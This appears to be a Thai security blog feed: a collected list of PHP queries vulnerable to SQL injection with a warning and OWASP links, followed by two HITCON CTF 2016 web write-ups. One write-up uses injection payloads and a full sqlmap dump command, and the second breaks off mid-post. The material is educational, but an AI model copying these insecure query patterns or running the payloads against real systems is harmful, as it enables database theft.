$CardSQL = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd ASC";
$First = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd ASC LIMIT 0,1";
$Last = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd DESC LIMIT 0,1";
$strSQL =" UPDATE request_color a JOIN printer_color b ON a.RequestPC = b.Printer_Color_ID SET b.ColorTotalNumber = '$ColorBalance1' WHERE a.RequestID = '".$_GET["id"]."' ";
$strSQL1 = "UPDATE meeting_list SET mstatus = 'S' where id = '".$_GET["id"]."' ";
$CardSQL = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' LIMIT 0, 6";
SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' LIMIT 0, 6
$strSQL = "SELECT * FROM tblmember WHERE Email = '".trim($_POST['Email'])."' ";
$strSQL = "SELECT * FROM tblmember WHERE (FirstName LIKE '%".$_GET["txtKeyword"]."%' or Lastname LIKE '%".$_GET["txtKeyword"]."%' and Class='ผ่านการอนุมัติ') ";
$sql_mem = "update member set fname ='$_POST[fname]',name ='$_POST[name]',birthday ='$_POST[birthday]',address ='$_POST[address]',road ='$_POST[road]',district ='$_POST[district]',city ='$_POST[city]',province ='$_POST[province]',country ='$_POST[country]',zipcode ='$_POST[zipcode]',phone ='$_POST[phone]',fax ='$_POST[fax]',mobile ='$_POST[mobile]',email ='$_POST[email]' where usermem = '$_POST[usermem]'";
$sql = "update send_detail set open='1' where send_id='$_GET[send_id]' and user_id = $k ";
$sql="select * from book , send ,send_detail , user , typebook where send_detail.user_id = $a and send_detail.send_id = send.send_id and send.book_id = book.book_id and send.user_id = user.user_id and book.typebook_id = typebook.typebook_id and send.send_id = '$_GET[send_id]' ";
$sql="select * from user where user_name='$_POST[username]' and user_password='$_POST[password]'";
$sql2="select * from admin where admin_name='$_POST[username]' and admin_password='$_POST[password]' ";
$strSQL = "SELECT * FROM product WHERE Supplier_ID = '".$_GET["Supplier_ID"]."' ";
$sql="INSERT INTO chat (name, texts)VALUES ('$_POST[name]','$_POST[mes]');";
$strSQL = "SELECT * FROM accounts WHERE Username = '".trim($_POST['Username'])."' ";
$strSQL = "INSERT INTO accounts (Username,Password) VALUES ('".$_POST["Username"]."',
$strSQL = "INSERT INTO accounts (Username,Password) VALUES ('".$_POST["Username"]."', '$password')";
$sqlTb = "SELECT * FROM treatment where date='$_POST[date]'";
$sql1 ='SELECT * FROM member WHERE username = "'.$_POST['ulog'].'"';
$sql ="SELECT member.*,profile.* FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE 1 AND member.IDstd = '".$_POST['searchID']."' ";
//$sql="SELECT * FROM member WHERE IDstd like '".$_POST['IDstd']."'";
if($mysql->query(" SELECT * FROM [tb_student] WHERE [idStudent] like '".$_POST['ids']."'") > 0 ){
$sql="SELECT * FROM member WHERE IDstd like '".$_POST['IDstd']."'";
$sql = "INSERT INTO students ('name', 'last_name') VALUES('" . $_POST['student_name'][$i] . "', '" . $_POST['student_last_name'][$i] . "')";
$res = $mysqli->query("SELECT * FROM ven_rent WHERE id_van = ".$_GET['u']);
$strSQL = "SELECT * from objective WHERE ob_quiz_id = ".$_POST["chkColor"][$i]."";
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."' ";
$strSQL = "INSERT INTO member (Username,Password,Name,Status) VALUES ('".$_POST["txtUsername"]."',
$strSQL = "SELECT * FROM course WHERE Id_Course = '".$_GET["Id_Course"]."' ";
$sql1="SELECT * FROM user WHERE username='".$_GET['username']."'";
$sql = "select * from po where POID like '%{$_POST['POID']}%'";
$query = "SELECT * FROM teacher WHERE (T_user='".$_POST["txtT_user"]."') AND (T_pw='".$_POST["txtT_pw"]."')";
$test_query="SELECT * FROM login WHERE username = '".$_POST['form-username']."'";
$strSQL = "SELECT * FROM subject WHERE subject = '".trim($_POST['txtsubject'])."' ";
$strSQL = "INSERT INTO subject (subject,course_description) VALUES ('".$_POST["txtsubject"]."','".$_POST["txtcourse_description"]."')";
$strSQL = "SELECT * FROM course INNER JOIN type_course ON course.type_cou_id=type_course.tp_cou_id WHERE cou_id = '".$_GET['cou_id']."' ";
$strSQL = "SELECT * FROM po2016 WHERE Po_number = '".$_GET["Po_number"]."' ";
$strSQL1 = " SELECT * FROM drb_product WHERE drb_pd_code = 'GL-ES-".$_POST["drb_pd_codeSE"]."' ";
$strSQL2 = " SELECT * FROM drb_product_up WHERE drb_pd_codeT = '".$_POST["drb_pd_codeT"]."' ";
} else { $strSQL = "SELECT * FROM city WHERE ProvinceID ='".$_GET["proid"]."' ORDER BY CityNameT ASC";
} else { $strSQL = "SELECT * FROM district WHERE CityID ='".$_GET["ampid"]."' ORDER BY DistrictNameT ASC";
$strSQL = "SELECT * FROM webboard WHERE QuestionID = '".$_GET["QuestionID"]."' ";
$strSQL2 = "SELECT * FROM reply WHERE QuestionID = '".$_GET["QuestionID"]."' order by replyID desc";
$sql='SELECT * FROM tbl_member WHERE user = "'.$_POST['username'].'"';
$sql1="INSERT INTO tbl_member value ('','".$_POST['name']."','".$_POST['username']."','".$_POST['mail']."','".$_POST['tel']."')";
$strSQL2 = "SELECT * FROM orders_detail WHERE OrderID = '".$_GET["OrderID"]."' ";
$strSQL = "SELECT * FROM slideshow WHERE slide_title = '".$_GET["CusID"]."' ";
$up_Leave = "UPDATE leave_leave SET Quota_id='$_POST[Quota_id]',
$strSQL = "SELECT * FROM data_course WHERE cou_id = '".$_GET['cou_id']."' ";
$sql_select_playlista = "select * from playlist where p_playlist_name = '".$_GET['pid']."'order by p_Order ";
$strSQL = "SELECT * FROM quotas WHERE Quota_id = '".$_POST["Quota_id"]."' ";
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."'
$sql="select * from question where subject_id='$_GET[subject_id]' ";
$sql="select * from choice where question_id='$_GET[question_id]' ";
$strSQL = "SELECT * FROM it_rep_form WHERE rep_no = '".$_GET["rep_no"]."' ";
$strSQL = "SELECT * FROM customer WHERE 1 AND CustomerID = '".$_POST["sCusID"]."' ";
$strSQL = "SELECT hex(pic1) FROM 2016_mission WHERE mission_id = '".$_GET["mission_id"]."' ";
$strSQL = "SELECT * FROM product WHERE (id_prd LIKE '%".$_GET["txtKeyword"]."%' or ProductName LIKE '%".$_GET["txtKeyword"]."%' )";
$strSQL = "SELECT * FROM customer WHERE displayname = '".trim($_POST['txtUsername'])."'
$strSQL = "update customer set namecus=". "'". $_POST["name"] ."'". ",";
$sql="select * from allotment_item where hotel_id='".$_REQUEST["id"]."' and status='1' order by no_id ";
$sql2="SELECT * FROM joinus WHERE eventstypecode='".$_POST["eventstypecode"]."'";
$sql1="SELECT * FROM joinus WHERE passport = '".$_POST["scan"]."'";
$sq1 = INSERT INTO strengthkf(keyID, strID) VALUES ('.$_POST['chkKey'][$key].','.$strID.'); //get keyI">
$sq1 = "UPDATE strengthkf SET keyID = '".$_POST['chkKey'][$key]."'
$strSQL = "SELECT * FROM member WHERE MemberID = '".$_POST["MemberID"]."' ";
$strSQL = "UPDATE member SET Username = '".$_POST["Username"]."', Password = '".$_POST["Password"]."', Name_member = '".$_POST["Name_member"]."', Addr_member = '".$_POST["Addr_member"]."'
$strSQL = "SELECT product_id, Qty FROM orders_detail where order_detail_id = ".($_REQUEST['order_detail_id'] * 1);
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_POST["CustomerID"]."' ";
$strSQL = "UPDATE customer SET Name_cus = '".$_POST["Name_cus"]."', Address = '".$_POST["Address"]."',
$strSQL1 = "SELECT * FROM tb_memfamily WHERE mem_id = '".$_GET['mem_id']."' ";
$strSQL = "SELECT * FROM product WHERE productno = '".$_GET["productno"]."'";
$sql_insert="INSERT INTO tbl_recived (a,b,c,d,e,f,g)VALUES('$_GET[a]','$_GET','$_GET[c]','$_GET[d]','$_GET[e]','$_GET[f]',NOW())";
INSERT INTO tbl_recived (a,b,c,d,e,f,g)VALUES('$_GET[a]','$_GET','$_GET[c]','$_GET[d]','$_GET[e]','$_GET[f]',NOW())";
$sql = "select * from diagnosis where di_opt1= '$_REQUEST[s1]' && di_opt2= '$_REQUEST[s2]' && di_opt3= '$_REQUEST[s3]' && di_opt4= '$_REQUEST[s4]' ";
$strSQL = "SELECT * FROM employee WHERE Department = '".$_POST["department"]."' "
$strSQL = "INSERT INTO koreanfood (con_name,con_email,con_phone,con_message) VALUES ('".$_POST["txt_name"]."',
$strSQL = "INSERT INTO koreanfood (con_name,con_email,con_phone,con_message,date) VALUES ('".$_POST["txt_name"]."',
$strSQL = "INSERT INTO info (Name,Skul,Age) VALUES ('".$_POST["txt_name"]."',
$sql="update tb_student set stu_name='$stu_name', address='$address', status='$status' where stu_id='{$_POST['txtid']}' ";
$sql="select * from tb_student where stu_id='{$_GET['id']}' ";
$sql="delete from tb_student where stu_id='{$_GET['id']}'";
$sql="UPDATE tb_student SET stu_name='$stu_name', address='$address', status='$status' where stu_id=".$_POST['txtid'];
$strSQL = "INSERT INTO orders (datetime,name,address,payment,date,tel,mail) VALUES ('".date("Y-m-d H:i:s")."','".$_POST["name"]."','".$_POST["address"]."','".$_POST["payment"]."','".$_POST["date"]."','".$_POST["tel"]."','".$_POST["mail"]."') ";
$sql = "SELECT * FROM menu WHERE menu_name LIKE ('".$_POST["search"]."')%";
$sqlr = "UPDATE proresult set EmployeeID='".$_POST['EmployeeID'][$i]."', Name='".$_POST['ResourceName'][$i]."', RoleName='".$_POST['RoleName'][$i]."', Category='".$_POST['ResourceCategory'][$i]."', Email='".$_POST['ResourceEmail'][$i]."', TelNo='".$_POST['ResourceTelNo'][$i]."', ResourceDeparment='".$_POST['ResourceDepartment'][$i]."' where ppid ='$ide'";
$sqlr = "UPDATE proresult set EmployeeID='".$_POST['EmployeeID'][$i]."',
$sqlr = "UPDATE proresult set EmployeeID='".$_POST['EmployeeID$i']."',
$strSQL2 = "INSERT INTO trans (datetime,name,address,date) VALUES ('".date("Y-m-d H:i:s")."','".$_POST["name"]."','".$_POST["address"]."' ,'".$_POST["date"]."') ";
$strSQL = "SELECT * FROM vehicle_tb WHERE (1 AND serial = '".$_POST["sserial"]."' OR assetNumber = '".$_POST["assetNumber"]."') and assetNumber !='' ";
$strSQL = "SELECT * FROM ordername WHERE id_order = '".$_GET["OrderID"]."' ";
$strSQL2 = "SELECT * FROM order_detial WHERE id_order = '".$_GET["OrderID"]."' ";
50.$strSQL2 = "SELECT * FROM order_detial WHERE id_order = '".$_GET["OrderID"]."' ";
/*$strSQL = "INSERT INTO s_scroll (m_username,m_password,m_name ,m_lastname ,m_level) VALUES ('".$_POST["txtUsername"]."',
$strSQL = "INSERT INTO s_scroll (s_name, s_text, s_color, s_bg, s_font, s_size, s_speed) VALUES ('".$_POST["T_Name"]."','".$_POST["T_Text"]."','".$_POST["T_Color"]."','".$_POST["T_BG"]."','".$_POST["T_Font"]."','".$_POST["size"]."','".$_POST["speed"]."')";
$strSQL = "SELECT * FROM webboard WHERE QuestionID = '".$_GET["QuestionID"]."' ";
if(!mysqli_query($objCon,"INSERT INTO reply (QuestionID,CreateDate,Details,Name) VALUES ('".$_GET["QuestionID"]."','".date("Y-m-d H:i:s")."','".$_POST["txtDetails"]."','".$_POST["txtName"]."') ")){
$strSQL2 = "SELECT * FROM reply WHERE QuestionID = '".$_GET["QuestionID"]."' ";
$strSQL1 = "SELECT * FROM product WHERE ProductName LIKE('".$_GET["ProductName"]."')";
$strSQL = "SELECT * FROM member WHERE PerId = '".trim($_POST['txtPerId'])."' ";
$strSQL = "SELECT * FROM member WHERE DriveId = '".trim($_POST['txtDriveId'])."' ";
$strSQL = "SELECT * FROM member WHERE Tel = '".trim($_POST['txtTel'])."' ";
$strSQL = "SELECT * FROM member WHERE Email = '".trim($_POST['txtEmail'])."' ";
$strSQL = "UPDATE customer SET Name = '".$_POST["txtName"]."'
$strSQL = "SELECT * FROM addinform WHERE ID_Inform= '".$_GET["ID_Inform"]."' ";
$strCHECK = "SELECT * FROM checkstock WHERE shopcode = '".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'";
$result = mysql_query("update product set qty = qty + '".$_POST["qty$i"]."' where ProductID = '".$_POST["productid$i"]."'");
$resultms = mysql_query("update ms set actqty = actqty - '".$_POST["qty$i"]."' where shopcode='".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'");
$strCHECKms = "SELECT * FROM ms WHERE shopcode = '".$_POST["toshop"]."' AND productid = '".$_POST["productid$i"]."'";
$resultoshop = mysql_query("update ms set actqty = actqty + '".$_POST["qty$i"]."' where shopcode='".$_POST["toshop"]."' AND productid = '".$_POST["productid$i"]."'");
$strSQL = "SELECT * FROM person WHERE Person_ID LIKE '%".$_GET["txtKeyword"]."%' ";
$sql = "INSERT INTO durable_goods VALUES('$_POST[Dg_idtxt]',$Dg_Income,'$_POST[Dg_nametxt]' ,'$POST[Dg_Brandtxt]','$_POST[Dg_Typetxt]','$_POST[Dg_colourtxt]', '$_POST[Dg_Sizetxt]','$_POST[PriceToUnittxt]','$_POST[Dg_budgettxt]','$_POST[Notetxt]')";
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_POST["lmName1"]."' ";
$sql = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";
$sql_a = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id ='$_GET[Locationname_id]' ORDER BY Locationareaname_id ";
$strSQL = "SELECT * FROM location_areaname WHERE Locationname_id ='$_GET[Locationname_id]' ";
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id ='$_GET[Locationname_id]' ORDER BY Locationareaname_id ";
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id = '$_GET[Locationname_id]' ORDER BY Locationareaname_id";
$sqlp = "INSERT INTO app_pro (appid, proname, mod, prore, probcp)VALUES('$id', '".$_POST['procname'][$i]."', '".$_POST['idmod'][$i]."','".$_POST['prore'][$i]."','".$_POST['probpc'][$i]."' )";
$sqlp = "INSERT INTO app_pro (proname, mod, prore, probcp)VALUES( '".$_POST['proname'][$i]."', '".$_POST['mod'][$i]."','".$_POST['prore'][$i]."','".$_POST['probpc'][$i]."' )";
$strsql = "INSERT INTO test (name)VALUES('".$_POST['test'][$i]."')";
$sql = "SELECT fac_sci_name, category FROM facultysci WHERE sci_criteria <= '".$_POST['data1']."'";
$dbname = "SELECT * FROM teacher WHERE (name LIKE '%".$_GET["search"]."%' or phone LIKE '%".$_GET["search"]."%' )";
$strSQL = "SELECT * FROM comparison WHERE type = '".$_GET["type"]."' ";
Quote:$strSQL = "SELECT * FROM comparison WHERE type = '".$_GET["type"]."' ";
</pre>
<br />
หากนำโค้ดในส่วนนี้ไปใช้งานกับเว็บแอพฯจริงๆ อาจทำให้ผู้ที่ไม่ประสงค์ดีหรือแฮกเกอร์เจาะระบบเข้ามาขโมยข้อมูลจากฐานข้อมูลออกไป หรือถึงขั้นยึดเครื่องที่ให้บริการเว็บแอพฯอยู่เลยก็เป็นไปได้ครับ สำหรับการป้องกัน/แก้ไขช่องโหว่ SQL Injection สามารถอ่านได้จาก OWASP: <a href="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet">https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</a><br />
<br />
ไอเดีย + Regexp: <a href="https://github.com/laurent22/so-sql-injections">https://github.com/laurent22/so-sql-injections</a><br />
SQL Injection Prevention Cheat Sheet: <a href="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet">https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</a><br />
ปล. เพื่อการศึกษาครับICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-85448451835627833992016-10-10T11:46:00.001+07:002016-10-10T11:46:53.383+07:00HITCON CTF 2016: Are you rich? (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
Are you rich? Buy the flag!<br />
<a href="http://52.197.140.254/are_you_rich/">http://52.197.140.254/are_you_rich/</a><br />
<span style="color: red;">ps. You should NOT pay anything for this challenge</span><br />
Some error messages which is non-related to challenge have been removed</blockquote>
<b>Solution:</b><br />
<br />
1. Access to website have 2 functions, <b>Get our bitcoin address</b> and <b>Verify payment</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSy3Nt1_mojhjwEKB6ErynrrOxvBaCBIkw8ityePqBh_IAXjO6wQCJsjF1sAf_2Wui0KVhz9PbmpLUtwnRhWhYV4MyR-YBJeM52J0KrTytnqMghLjHMe2rlaDzEgdcgDCYPYlRyjt9mVGs/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSy3Nt1_mojhjwEKB6ErynrrOxvBaCBIkw8ityePqBh_IAXjO6wQCJsjF1sAf_2Wui0KVhz9PbmpLUtwnRhWhYV4MyR-YBJeM52J0KrTytnqMghLjHMe2rlaDzEgdcgDCYPYlRyjt9mVGs/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. Try to get our bitcoin address, It will generate some Bitcoin Address and go to verify it.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuHwpZ62Dk2hI23DrrEOJDEb5v7w54tYJtUXk7hylmFGGOaMXYsZi5EaXn_WjFy-t6uwyBox0GenWDT1C1iknpim8FWkI_StNwq0lfh0VfP1Ok6TbFJx1lNNCOCGSGl2k7-jnuh_UYmXxx/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuHwpZ62Dk2hI23DrrEOJDEb5v7w54tYJtUXk7hylmFGGOaMXYsZi5EaXn_WjFy-t6uwyBox0GenWDT1C1iknpim8FWkI_StNwq0lfh0VfP1Ok6TbFJx1lNNCOCGSGl2k7-jnuh_UYmXxx/s400/2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. Not have enough money, I guess after get our bitcoin it may insert this bitcoin into database and have verify payment to check. I try to SQL Injection in <b><i>Address </i></b>field.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. <span style="font-weight: bold;">' or 1=1#</span><i style="font-weight: bold;"> </i>--- Found more than 1 records?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLloMIfvCyLi_xBuGoUkEYiqp46ZxPKOPCw-yrT66dB_kgVwEawCj-fwXJrI1mbHpHEUdtsT-iXKikNtFPilyjuVuPDUbzXclWpfEveQk9AyesrCH96Ix09bb8hh49mzZ461JST93llr9J/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLloMIfvCyLi_xBuGoUkEYiqp46ZxPKOPCw-yrT66dB_kgVwEawCj-fwXJrI1mbHpHEUdtsT-iXKikNtFPilyjuVuPDUbzXclWpfEveQk9AyesrCH96Ix09bb8hh49mzZ461JST93llr9J/s320/3.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. <b>' or 1=2#</b> --- does not have enough confirmed money?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5TMQWdufsUbFYjoFe7QM9LxOEx29RhvYxL7BKg__CTAggPe_2gSleel78ej8VJxmlQ2uzNGEKhbhyphenhyphensMfiFdDEH5iOM9LgXigLEQNATou-615Rqg3mZprCU95Nc_Y9vVMQMRB6_4H7EEXt/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5TMQWdufsUbFYjoFe7QM9LxOEx29RhvYxL7BKg__CTAggPe_2gSleel78ej8VJxmlQ2uzNGEKhbhyphenhyphensMfiFdDEH5iOM9LgXigLEQNATou-615Rqg3mZprCU95Nc_Y9vVMQMRB6_4H7EEXt/s400/4.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. Confirm the parameter <b><i>address</i> </b>have vulnerable to <a href="https://www.owasp.org/index.php/SQL_Injection">SQL Injection</a>, I use <a href="https://portswigger.net/burp/">Burp Suite</a> to capture HTTP request and copy it to text file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<pre class="brush:[php];">POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8
address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=
</pre>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. Using SQLmap -r option to Load HTTP request from a text file, SQLmap verify this vulnerable is <a href="https://www.owasp.org/index.php/Blind_SQL_Injection">Time-Based Blind SQL Injection</a>, and final SQLmap option that use for get a flag.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<i><b>python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump</b></i></div>
<div class="separator" style="clear: both; text-align: left;">
<i><b><br /></b></i></div>
<div class="separator" style="clear: both; text-align: left;">
6. Wait a several minute to retrieve a flag.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3R3PARXpbBm3gwdy9qwm2FtUMgFAyq0uu90tIPBExgzGH5kTct5APlDVg-vB5Bg8-w9qysOGmFL7zSteAIi4QzXZ_YlRjPziNfWN-3DfY8uyVRZRiCDsfHC8DXwVR2FVuWwDkqcKoMpfu/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3R3PARXpbBm3gwdy9qwm2FtUMgFAyq0uu90tIPBExgzGH5kTct5APlDVg-vB5Bg8-w9qysOGmFL7zSteAIi4QzXZ_YlRjPziNfWN-3DfY8uyVRZRiCDsfHC8DXwVR2FVuWwDkqcKoMpfu/s320/5.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In Burp Suite (Union Based)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuHD_x3WRLXEOAj0kJGPomhPrOYWFo0yNj2EmRSs5BzDp34FTP9OyxSOxO1GxRC-h8CjUYrmJ9gHImVLs0C65760OqLzLnvcylhKW_A0j98b_HxZuXHdUbAwIbmXo8ekknrAp8WEgICUH-/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuHD_x3WRLXEOAj0kJGPomhPrOYWFo0yNj2EmRSs5BzDp34FTP9OyxSOxO1GxRC-h8CjUYrmJ9gHImVLs0C65760OqLzLnvcylhKW_A0j98b_HxZuXHdUbAwIbmXo8ekknrAp8WEgICUH-/s400/6.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="color: red;">Flag: </span></b><b>hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}</b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com2tag:blogger.com,1999:blog-9154377361493966397.post-36945262640004839022016-10-10T11:46:00.000+07:002016-10-10T11:46:33.274+07:00HITCON CTF 2016: %%% (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
Although it is easy, but I still made this challenge because it is useful in penetration testing.<br />
<a href="http://52.196.116.69/">http://52.196.116.69/</a></blockquote>
<b>Solution:</b><br />
<br />
1. Access to the web, Have an error about certificate.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU4NxAfHhyphenhyphenv9880401lIBjXWZf3hhiiG67CTyqgQEh8pz6fvEmsneCDhNeHN4QawzOowitVWRdh4dJqZmZqeMsqffEHpZIIFekkzjO6SeoTDmYwF6u5-1QXwfIgpnwspfibllbsz8Pzco0/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU4NxAfHhyphenhyphenv9880401lIBjXWZf3hhiiG67CTyqgQEh8pz6fvEmsneCDhNeHN4QawzOowitVWRdh4dJqZmZqeMsqffEHpZIIFekkzjO6SeoTDmYwF6u5-1QXwfIgpnwspfibllbsz8Pzco0/s1600/1.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
2. View certificate.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPaDcaHSl1CMyYdq_OXAhdGn_AVCXhW4fajop7wajTkQBrKsE3_ge3MFTSIm6gdJKaAL-S1Nvu2Otf71r6C-oHWnk5nJZJRHJku2wc6VnZCUkrHZJyFTa7kFgHAoUrTWEdWaInZyvNpFHa/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPaDcaHSl1CMyYdq_OXAhdGn_AVCXhW4fajop7wajTkQBrKsE3_ge3MFTSIm6gdJKaAL-S1Nvu2Otf71r6C-oHWnk5nJZJRHJku2wc6VnZCUkrHZJyFTa7kFgHAoUrTWEdWaInZyvNpFHa/s400/2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. very-secret-area-for-ctf.orange.tw, Try to modify hosts file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>52.196.116.69<span class="Apple-tab-span" style="white-space: pre;"> </span>very-secret-area-for-ctf.orange.tw</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. Access to <a href="http://very-secret-area-for-ctf.orange.tw/">very-secret-area-for-ctf.orange.tw</a> and get a flag.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
